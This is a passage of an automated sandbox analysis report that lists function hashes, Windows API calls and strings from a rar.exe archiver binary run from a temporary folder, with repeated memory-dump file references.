                                                                                                                                                                                                                                                                    • Instruction ID: 5ab1b1d44ac4a0d6ea94d7dd2b7b20facd787108d5c3155c99ca7bfcc57714ef
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C41E273A1868186FB748F24E5057B96AE0E745BB8F541338DE79876C4DF7CC8898B40

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: swprintf
                                                                                                                                                                                                                                                                    • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                                                                    • API String ID: 233258989-2235180025
                                                                                                                                                                                                                                                                    • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                                                    • Instruction ID: f75bb392ce774016513464b1a20d73f592312c502e6213001c4bd32b9d1f64c7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E941C622A1868281EB24EB21F8111F963F0FF44B94F402279EA5E836D5DF7CDD89C304

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                                                                    • String ID: rar.lng
                                                                                                                                                                                                                                                                    • API String ID: 553376247-2410228151
                                                                                                                                                                                                                                                                    • Opcode ID: 7e1301cb8d14e0988d3300aafa180966a10fc4473626eed87f904aa64d252951
                                                                                                                                                                                                                                                                    • Instruction ID: e82f094982c87416ffcee3684eee38523c444ad066757c70c22fcaf1e0582b47
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e1301cb8d14e0988d3300aafa180966a10fc4473626eed87f904aa64d252951
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77419222E0D28385FA34AB20A4121B927E1DF51F54F5422B9E94DCB2D7CE6DEC0E8759

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SHGetMalloc.SHELL32(?,00000800,?,00007FF695D04432,?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D040C4
                                                                                                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D040DF
                                                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32 ref: 00007FF695D040F1
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF695D0413F,?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695CF34A0
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF695D0413F,?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695CF34D5
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                                                                    • String ID: WinRAR
                                                                                                                                                                                                                                                                    • API String ID: 977838571-3970807970
                                                                                                                                                                                                                                                                    • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                                                    • Instruction ID: 4be86d14994a0760169d145f174f5d8c9d11b1bfec9171d4c8614700e4284350
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D219316A08B4291EA609F22F8501BA53A1EF89FE0F496172DF0E87799DE3CD848C744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2244327787-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                                                                    • Instruction ID: 126bc08f584d1fbcd9781a969216d695ee049bff97d354697ccbfab685912c74
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34219022E08946C2FA708B21E40437966F4FF51F98F2041B9EE59CB6C8CF2DDC449741
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: AFUM$default.sfx
                                                                                                                                                                                                                                                                    • API String ID: 0-2491287583
                                                                                                                                                                                                                                                                    • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                                                    • Instruction ID: 709d2c6851a511b6948463c94ad08be97209c3a70bb62ac461590dfb2edc7f6e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8681D423E0C682E0EB709B1081822BD22F0EF51F84F4491B9DE8D976C6DF6DAD89C754
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe
                                                                                                                                                                                                                                                                    • API String ID: 3307058713-3541919097
                                                                                                                                                                                                                                                                    • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                                                                    • Instruction ID: 7c578070e661db9381252f5d0dc978d0902421068b26b9bc0008fc4525e4d3bf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8418D32A08A5285EB34DF25A9400B867E4EF44F98B546275E94EC7B95DF3DE849C308
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                    • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                                                    • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                                                    • Instruction ID: 0a85f10918fc8817e918c10ec892dbf197bc14133d947533039cbaa9443c0a3b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA219822A1874241EB788B25B49013926D5EB45FB8F2423B5DA6F877D8CF38DC85C309
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                                                                    • String ID: CreateThread failed
                                                                                                                                                                                                                                                                    • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                                                                    • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                                                    • Instruction ID: 2fd90fb4d8ea702f50806fee249fb01387714d6dd4185b13c86f4a60d41b623d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D115B32A09A42C2FB24DB10E8411B973B0FB84F84F549275EA9D87669DF3CED4AC744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3094578987-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                                                    • Instruction ID: 2b1dda1a4501d50375e9715cffd7e16b9fd0a65c7295f8c20d68ee709cc3ed92
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BF08622608B4683EA349F21F68007963A0FF89F99F045370DE9D4B6A9CF3CD94D8B04
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                    • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                                                    • Instruction ID: 5ce63aee431abb8d5e09071f86b44b46b57178b33090a5582740dd18b950ffce
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16E01A20E0871542EA64AF2098853792392EF95F85F0066B8CC0E873D3CE3DAC4C8394
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
